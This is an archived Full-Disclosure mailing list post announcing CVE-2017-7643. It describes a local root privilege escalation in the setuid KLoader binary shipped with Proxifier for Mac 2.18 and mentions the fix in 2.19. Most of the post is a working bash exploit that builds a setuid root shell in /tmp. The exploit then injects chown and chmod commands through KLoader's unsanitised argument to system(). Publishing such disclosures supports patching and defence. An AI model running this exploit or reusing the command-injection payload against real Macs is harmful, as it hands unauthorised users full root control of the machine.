lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <A8C98BFA-D6DF-438A-876B-9DE15D736B88@rkw.io> Date: Tue, 11 Apr 2017 11:03:45 +0100 From: "Mark Wadham" <fd@....io> To: fulldisclosure@...lists.org Subject: [FD] CVE-2017-7643 Local root privesc in Proxifier for Mac <= 2.18 Proxifier 2.18 (also 2.17 and possibly some earlier version) ships with a KLoader binary which it installs suid root the first time Proxifier is run. This binary serves a single purpose which is to load and unload Proxifier's kernel extension. Unfortunately it does this by taking the first parameter passed to it on the commandline without any sanitisation and feeding it straight into system(). This means not only can you load any arbitrary kext as a non-root user but you can also get a local root shell. Although this is a bit of a terrible bug that shouldn't be happening in 2017, Proxifier's developers fixed the issue in record time so that's something! Everyone using Proxifier for Mac should update to 2.19 as soon as possible. https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html ------------------------------------------------------------------- #!/bin/bash ##################################################################### # Local root exploit for vulnerable KLoader binary distributed with # # Proxifier for Mac v2.18 # ##################################################################### # by m4rkw # ##################################################################### cat > a.c < #include int main() { setuid(0); seteuid(0); execl("/bin/bash", "bash", NULL); return 0; } EOF gcc -o /tmp/a a.c rm -f a.c /Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a' /tmp/a ------------------------------------------------------------------- _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists